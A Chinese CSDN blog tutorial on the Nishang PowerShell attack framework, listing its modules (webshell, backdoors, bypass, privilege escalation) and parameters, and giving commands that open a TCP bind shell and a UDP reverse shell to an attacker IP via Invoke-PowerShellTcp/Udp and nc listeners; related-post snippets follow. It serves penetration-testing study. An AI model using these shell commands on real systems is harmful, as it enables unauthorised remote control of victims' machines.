基础篇:内网工具Nishang PowerShell

已于 2022-04-12 14:12:07 修改
阅读量1.7k 收藏 2
点赞数 5
文章标签: 网络安全
于 2022-04-12 14:11:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60115503/article/details/124121773
版权

目录

Nishang介绍

NiShang目录介绍

Nishang参数

NC参数

基于TCP协议的powershell交互式shell

Nishang介绍

Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段

Nishang下载

NiShang目录介绍

        ActiveDirectory:活动目录

        Antak-Webshell:在内存中执行PowerShell脚本,运行命令,并使用此Webshell下载和上传文件

        Backdoors:一个后门,可以从第三方网站接收指令,并在内存中执行PowerShell脚本

        Bypass:实施公告已知方法来绕过

        Client:客户端

        Escalationl:当需要权限时提取

        Executionl:命令执行RCE

        Gatherl信息收集

        MITE:用于MITM攻击的本地HTTOS代理

        Misc:脚本

        Piovt:跳板

        Prasadhak:对照VirusTotal数据库检查正在进行的进程的运行哈希

        Scan:扫描

        Shells:shell

        Utility:杂项

        Powerpreter:Meterpreter会话

Nishang参数

        -IPAddress方向连接时需要连接到的IP地址

        -Port反向连接时是需要连接到的端口,选择-Bind选项时是需要监听端口

        -Reverse反向连接

        -Bind正向连接用到的端口监听

NC参数

        -n 直接使用ip地址,而不通过域名服务器

        -v 显示指令执行过程

        -l 使用监听模式 管控传入的资料 (适合反向连接)

        -p 设置本地主机使用的通信端口

基于TCP协议的powershell交互式shell

        Invoke-PowerShellTcp是PowerShell交互式正向或反向连接shell 

靶机执行:./Invoke-PowerShellTcp.ps1    Invoke-PowerShellTcp -Bind -Port 6666

        在攻击机上使用nc工具正向连接目标主机

攻击机:nc -nv <Inovke-Powershell开启交互式的靶机ip> 6666

基于UDP协议的交互式反弹shell     

靶机执行:./Invoke-PowerShellUdp -Reverse -IPAddress <攻击机的ip> -port 555

        在攻击机使用nc工具反向连接目标主机 

攻击机:nc -luvp 555

QiaN_djx
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nishang, Nishang PowerShell测试和攻击性安全.zip
09-18
nishang, Nishang PowerShell测试和攻击性安全 Nishang是一个框架和脚本,它允许使用PowerShell安全性。穿透测试和红色组合的脚本。 在渗透测试的所有阶段,Nishang都是有用的。按 nikhil_mitt用法导入当前...
nishangNishang-用于红队,渗透测试和进攻安全的进攻性PowerShell
02-05
学习和使用Nishang需要对PowerShell有一定的基础,同时也需要理解渗透测试的道德规范和法律法规。在实际操作中,确保始终在合法授权和安全环境中使用这些工具,避免对他人或组织造成不必要的损害。 通过深入研究...
Nishang工具的介绍和基本使用
菜鸟-宇的个人博客
10-03 164
是一个脚本和有效负载的框架和集合,支持使用PowerShell进行攻击性安全、渗透测试和红色团队。Nishang集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本在渗透测试的所有阶段都很有用。
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1883
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
测试UDP端口连通性_udp端口测试,996页阿里软件测试面试真题解析火爆全网
最新发布
2401_84264491的博客
04-16 237
如上所示,如果返回结果中,端口号后面的括号中返回的是?号,则说明相应的UDP端口访问失败;体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。(img-hLqPjGfH-1713230130160)]如果返回的是具体的协议类型,则说明相应的UDP端口访问正常。nc -uv 目的地IP 8080。Windows版nc不要使用。是被阻断或者没有打开的状态。
推荐一下十三款内网穿透工具(超全)
kjhlw的博客
04-21 1万+
官网地址:https://www.shenzhuohl.com/chuantou.html。支持操作系统:windows (无界面客户端)(使用DOS命令框)支持操作系统:windows (无界面客户端)(使用DOS命令框)支持操作系统:windows (无界面客户端)(使用DOS命令框)支持操作系统:windows (无界面客户端)(使用DOS命令框)支持操作系统:windows (无界面客户端)(使用DOS命令框)支持操作系统:windows (无界面客户端)(使用DOS命令框)
测试UDP端口连通性
热门推荐
识途老码
09-02 5万+
测试UDP端口连通性Linux测试UDP端口windows测试UDP端口 测试UDP端口连通性 Linux测试UDP端口 利用namp探测udp端口 nmap -sU 1.1.1.1 -p 5555 -Pn STATE为open是正常打开的状态 STATE为filtered是被阻断或者没有打开的状态 根据操作系统类型的不同,使用如下指令确认系统内已经安装有nc测试工具; #检查工具是否安装 which nc #如果安装会显示 /bin/nc 如果nc未被安装,根据操作系统的不同,使用yum或apt-ge
内网工具 CS的基础使用
m0_57856283的博客
03-12 7146
1 powershell 技术 1.1powershell 简介 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。 Windows PowerShell v3 将伴随着 Microsoft Hyper-V 3.0 和 Windows...
Nishang2022最新可用版本,稳定
06-28
Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段 NiShang目录介绍 ActiveDirectory:活动目录 Antak-Webshell:在内存中执行PowerShell脚本,...
公众号和小程序的java源码-nishang:Nishang-用于渗透测试和攻击性安全的PowerShell。https://github.c
06-06
Nishang 是一个脚本和有效载荷的框架和集合,它支持使用 PowerShell 进行攻击性安全、渗透测试和红队。 Nishang 在渗透测试的所有阶段都很有用。 经过 用法 导入当前 PowerShell 会话中的所有脚本(PowerShell v3 ...
[ 内网渗透 ] 内网端口扫描.zip
02-11
1. NishangNishang是一个PowerShell渗透测试框架,提供了多种命令行工具,包括端口扫描、信息收集、权限提升等功能。例如,`PortScan`命令可以进行TCP和UDP端口扫描。 2. PowerSploit: PowerSploit是由Matt ...
PowerShell攻防进阶nishang工具用法详解
weixin_33795806的博客
09-14 917
本文讲的是PowerShell攻防进阶nishang工具用法详解, 1.简介 Nishang是一款针对PowerShell的渗透工具。说到渗透工具,那自然便是老外开发的东西。国人开发的东西,也不是不行,只不过不被认可罢了。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源什么的都不重要。总之,nishang也是一款不可多得的好...
推荐三款内网渗透神器!
jklove9的博客
03-02 3303
推荐三款内网渗透神器---fscan kscan RequestTemplate
收藏 10款内网穿透工具
m0_59598029的博客
03-07 1276
首先,我们生活中的网络从应用上可以分为内网和外网;内网就是你自己的网络环境,就你自己能访问,比如你本地测试进行的localhost;外网就不言而喻了,你看网页,视频等这些网址都是外网。那么什么又是内网穿透呢?简单的说就是通过访问一个外网地址,然后穿透到你的内网地址。内网穿透又叫端口映射,用一句最简单的话来讲就是:将你的计算机所连接的私有网络映射到公网上,别人通过你给的域名或ip即可访问你本地的服务。
Powershell 渗透测试工具-Nishang
weixin_33713503的博客
11-09 450
Powershell 渗透测试工具-Nishang 分享到: 作者:V1ct0r 稿费:500RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 传送门 【技术分享】Powershell 渗透测试工具-Nishang(一) 0x00 介绍 Powershell用于渗透测试其实早...
一些值得收藏的PowerShell工具
月光轩辕的专栏
12-02 2854
转自http://www.freebuf.com/tools/87647.html 本文旨在分享部分PowerShell工具,仅供安全学习,禁止非法利用。 UnmanagedPowerShell :https://github.com/leechristensen/UnmanagedPowerShell 可以从一个非托管程序来执行PowerShell , 经过一些修改
内网神器-Nishang之信息收集(二)
qq_45434762的博客
07-08 269
域信息收集查询域net view /domain 查询域内计算机net view /domain:nowsec 查询域内所有用户组列表net group /domain 查询所有与成员计...
无文件渗透实验
一个码农的笔记
03-09 4327
无文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍: 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.1
无弹窗渗透实验
一个码农的笔记
09-02 5022
首先是内网的拓扑 拓扑说明: 【1】10.101.101.0/24的网段模拟的是外网的地址 【2】192.168.101.0/24的网段模拟的是一个小型企业的内网中的应用服务器网络 【3】192.168.111.0/24的网段模拟的是一个小型企业的内网中的办公网络 【4】企业内网可以无限制的访问到外网,但是外网无法访问到企业内网 【5】办公网可以无限制的访问到应用服务器网络,但是应用
powershell 监控
10-20
此外,Nishang是基于PowerShell的渗透测试专用工具,其中包括了下载和执行、键盘记录、dns、延时命令等脚本,可以用于实现对目标的屏幕进行实时监控。总之,PowerShell监控是一种非常实用的监控方法,可以帮助用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值